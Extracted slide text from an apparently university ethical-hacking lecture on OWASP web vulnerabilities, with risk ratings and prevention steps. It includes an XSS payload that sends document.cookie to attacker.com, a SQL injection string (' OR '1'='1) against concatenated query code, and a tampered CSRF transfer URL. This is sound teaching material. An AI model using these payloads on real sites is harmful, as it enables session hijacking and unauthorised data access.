Upload
mike-crabb
View
19.798
Download
0
Embed Size (px)
Citation preview
CROSS SITE SCRIPTINGRGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
SQL INJECTIONRGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING RGU ETHICAL HACKING
COOKIE EDITINGRGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
CROSS SITE REQUEST FORGERYRGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKING RGU ETHICAL HACKINGSENSITIVE DATA EXPOSURE RGU ETHICAL HACKINGRGU ETHICAL HACKING
CROSS SITE SCRIPTING
SQL INJECTION
CROSS SITE REQUEST FORGERY
SENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
ATTACK
ATTACK
ATTACK
WEAKNESS
WEAKNESS
WEAKNESS
WEAKNESS
CONTROL
CONTROL
ASSETS
FUNCTIONS
ThreatAgents
AttackVectors
SecurityWeaknesses
SecurityControls
TechnicalImpacts
BusinessImpacts
ATTACK
WEAKNESS
CONTROL
FUNCTIONS
IMPACT
IMPACT
IMPACTIMPACT
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
ThreatAgents
AttackVectors
SecurityWeaknesses
SecurityControls
TechnicalImpacts
BusinessImpacts
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
ThreatAgents
AttackVectors
SecurityWeaknesses
TechnicalImpacts
BusinessImpacts
APPLICATION SPECIFIC
DIFFICULT
UNCOMMON
AVERAGE
SEVERE
APPLICATION SPECIFIC
Prevalence
Detectability
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
ThreatAgents
AttackVectors
SecurityWeaknesses
TechnicalImpacts
BusinessImpacts
APPLICATION SPECIFIC
DIFFICULT
UNCOMMON
AVERAGE
SEVERE
APPLICATION SPECIFIC
Prevalence
Detectability
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
STEPS TO PREVENTConsidering the threats you plan to protect this data from (e.g., insider attack, external user), make sure you encrypt all sensitive data at rest and in transit in a manner that defends against these threats.
Don’t store sensitive data unnecessarily. Discard it as soon as possible. Data you don’t have can’t be stolen.
Ensure strong standard algorithms and strong keys are used, and proper key management is in place.
Ensure passwords are stored with an algorithm specifically designed for password protection, such as bcrypt, PBKDF2, or scrypt.
Disable autocomplete on forms collecting sensitive data and disable caching for pages that contain sensitive data.
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
ThreatAgents
AttackVectors
SecurityWeaknesses
TechnicalImpacts
BusinessImpacts
APPLICATION SPECIFIC
AVERAGE
COMMON
EASY
MODERATE
APPLICATION SPECIFIC
Prevalence
Detectability
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
ThreatAgents
AttackVectors
SecurityWeaknesses
TechnicalImpacts
BusinessImpacts
APPLICATION SPECIFIC
AVERAGE
COMMON
EASY
MODERATE
APPLICATION SPECIFIC
Prevalence
Detectability
HTTP://WWW.MYAMAZINGBANK.COM/TRANSFERFUNDS.PHP?FROM=1234&TO=4321&AMOUNT=500
HTTP://WWW.MYAMAZINGBANK.COM/TRANSFERFUNDS.PHP?FROM=1234&TO=666&AMOUNT=5000
VERY EASY ATTACK. SOMETHING LIKE THIS…
CAN BE CHANGED TO THIS
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
STEPS TO PREVENTThe preferred option is to include the unique token in a hidden field. This causes the value to be sent in the body of the HTTP request, avoiding its inclusion in the URL, which is more prone to exposure.
The unique token can also be included in the URL itself, or a URL parameter. However, such placement runs a greater risk that the URL will be exposed to an attacker, thus compromising the secret token.
Requiring the user to re-authenticate, or prove they are a user (e.g., via a CAPTCHA) can also protect against CSRF.
Easiest fix, when dealing with forms, is to change it from GET to POST
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
ThreatAgents
AttackVectors
SecurityWeaknesses
TechnicalImpacts
BusinessImpacts
APPLICATION SPECIFIC
AVERAGE
WIDESPREAD
AVERAGE
SEVERE
APPLICATION SPECIFIC
Prevalence
Detectability
BROKEN AUTHENTICATION
AND SESSION MANAGEMENT
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
STEPS TO PREVENTThe primary recommendation for an organisation is to make available to developers:
A single set of strong authentication and session management controls. Such controls should strive to:
1. meet all the authentication and session management requirements defined in OWASP’s Application Security Verification Standard (ASVS) areas V2 (Authentication) and V3 (Session Management).
2. have a simple interface for developers. Consider the ESAPI Authenticator and User APIs as good examples to emulate, use, or build upon.
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
ThreatAgents
AttackVectors
SecurityWeaknesses
TechnicalImpacts
BusinessImpacts
APPLICATION SPECIFIC
EASY
COMMON
AVERAGE
SEVERE
APPLICATION SPECIFIC
Prevalence
Detectability
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
ThreatAgents
AttackVectors
SecurityWeaknesses
TechnicalImpacts
BusinessImpacts
APPLICATION SPECIFIC
EASY
COMMON
AVERAGE
SEVERE
APPLICATION SPECIFIC
Prevalence
Detectability
STRING QUERY = "SELECT * FROM ACCOUNTS WHERE CUSTID='" + REQUEST.GETPARAMETER("ID") + "'";
HTTP://EXAMPLE.COM/APP/ACCOUNTVIEW?ID=' OR '1'='1
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
ThreatAgents
AttackVectors
SecurityWeaknesses
TechnicalImpacts
BusinessImpacts
APPLICATION SPECIFIC
EASY
COMMON
AVERAGE
SEVERE
APPLICATION SPECIFIC
Prevalence
Detectability
STRING QUERY = "SELECT * FROM ACCOUNTS WHERE CUSTID='" + REQUEST.GETPARAMETER("ID") + "'";
HTTP://EXAMPLE.COM/APP/ACCOUNTVIEW?ID=' OR '1'='1
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
STEPS TO PREVENTPreventing injection requires keeping untrusted data separate from commands and queries.
The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterised interface. Be careful with APIs, such as stored procedures, that are parameterised, but can still introduce injection under the hood.
If a parameterised API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. OWASP’s ESAPI provides many of these escaping routines.
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
ThreatAgents
AttackVectors
SecurityWeaknesses
TechnicalImpacts
BusinessImpacts
APPLICATION SPECIFIC
AVERAGE
VERY WIDESPREAD
EASY
MODERATE
APPLICATION SPECIFIC
Prevalence
Detectability
(STRING) PAGE += "<INPUT NAME='CREDITCARD' TYPE='TEXT' VALUE='" + REQUEST.GETPARAMETER("CC") + "'>";
'><SCRIPT>DOCUMENT.LOCATION= 'HTTP://WWW.ATTACKER.COM/CGI-BIN/COOKIE.CGI ?FOO='+DOCUMENT.COOKIE</SCRIPT>'.
CROSS SITE SCRIPTINGSQL INJECTION
CROSS SITE REQUEST FORGERYSENSITIVE DATA EXPOSURE
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKINGRGU ETHICAL HACKINGRGU ETHICAL HACKING
RGU ETHICAL HACKING
RGU ETHICAL HACKING
STEPS TO PREVENTPreferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into.
Positive or “whitelist” input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. For rich content, consider auto-sanitization libraries like the Java HTML Sanitizer Project.
Consider Content Security Policy (CSP) to defend against XSS across your entire site.